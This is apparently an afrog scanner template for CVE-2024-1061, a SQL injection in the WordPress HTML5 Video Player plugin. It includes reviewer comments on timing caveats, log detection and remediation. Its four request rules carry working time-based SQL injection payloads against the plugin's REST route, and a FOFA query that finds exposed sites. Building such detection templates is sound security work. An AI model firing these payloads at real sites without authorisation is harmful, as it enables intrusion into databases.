漏洞描述
Fofa: "wordpress" && body="html5-video-player"
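# Scanner PoC template (the rules/expression layout matches the afrog
# template format) for CVE-2024-1061: SQL injection in the WordPress
# "HTML5 Video Player" plugin.
#
# NOTE(review): this listing had lost all indentation, so it did not parse
# as the intended structure (duplicate top-level keys, block scalars with no
# indented content). The nesting below is reconstructed; all keys and values
# are unchanged. Confirm against the upstream template before running it.
#
# What it checks: the `id` query parameter of the REST route
# /h5vp/v1/view/1 is probed with a time-based payload. A rule passes only
# when the response is HTTP 200, the body contains both `created_at` and
# `video_id`, and the latency falls in a 2000-unit window starting at the
# requested sleep (presumably milliseconds, since 10000 pairs with
# SLEEP(10) and 6000 with SLEEP(6)).
#
# Review caveats:
#   - No baseline latency is measured. A target whose normal response time
#     exceeds the 2000-unit slack falls outside the window (false negative).
#   - The four probes together request 32 s of database sleep per target,
#     so scan concurrency and timeouts need to account for that.
#   - Log/WAF detection: these probes appear in access logs as requests to
#     rest_route=/h5vp/v1/view/ carrying a non-numeric `id` value.
#   - Remediation: update the plugin to a release that fixes CVE-2024-1061
#     (the fixed version is not stated on this page).
id: CVE-2024-1061

info:
  name: WordPress HTML5 Video Player SQL注入
  author: zan8in
  severity: high
  verified: true
  # The description holds only the FOFA search expression used to
  # fingerprint the plugin, not a description of the flaw itself.
  description: |-
    Fofa: "wordpress" && body="html5-video-player"
  reference:
    - https://mp.weixin.qq.com/s/CqxyVUaSEwgjrCA8aLKQpg
  tags: cve,cve2024,wordpress,sqli
  created: 2024/02/21

rules:
  # r0: 10-second delay probe; accepted latency window is 10000-12000.
  r0:
    request:
      method: GET
      path: /?rest_route=/h5vp/v1/view/1&id=1%27+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))a)--+
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'created_at') &&
      response.body.bcontains(b'video_id') &&
      response.latency <= 12000 &&
      response.latency >= 10000
  # r1: 6-second delay probe; accepted latency window is 6000-8000.
  # Using a second, different delay shows that latency follows the payload
  # rather than the server simply being slow.
  r1:
    request:
      method: GET
      path: /?rest_route=/h5vp/v1/view/1&id=1%27+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'created_at') &&
      response.body.bcontains(b'video_id') &&
      response.latency <= 8000 &&
      response.latency >= 6000
  # r2: identical to r0; repeats the 10-second probe to rule out a one-off
  # latency spike.
  r2:
    request:
      method: GET
      path: /?rest_route=/h5vp/v1/view/1&id=1%27+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))a)--+
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'created_at') &&
      response.body.bcontains(b'video_id') &&
      response.latency <= 12000 &&
      response.latency >= 10000
  # r3: identical to r1; repeats the 6-second probe.
  r3:
    request:
      method: GET
      path: /?rest_route=/h5vp/v1/view/1&id=1%27+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'created_at') &&
      response.body.bcontains(b'video_id') &&
      response.latency <= 8000 &&
      response.latency >= 6000
    # NOTE(review): placed under r3 because it follows r3's expression in the
    # flattened listing; confirm against upstream. The two entries look like
    # static labels (the two delays used) attached to the finding, not values
    # extracted from the response.
    extractors:
      - type: word
        extractor:
          latency1: "6s"
          latency2: "10s"

# All four timing probes must pass before the target is reported.
expression: r0() && r1() && r2() && r3()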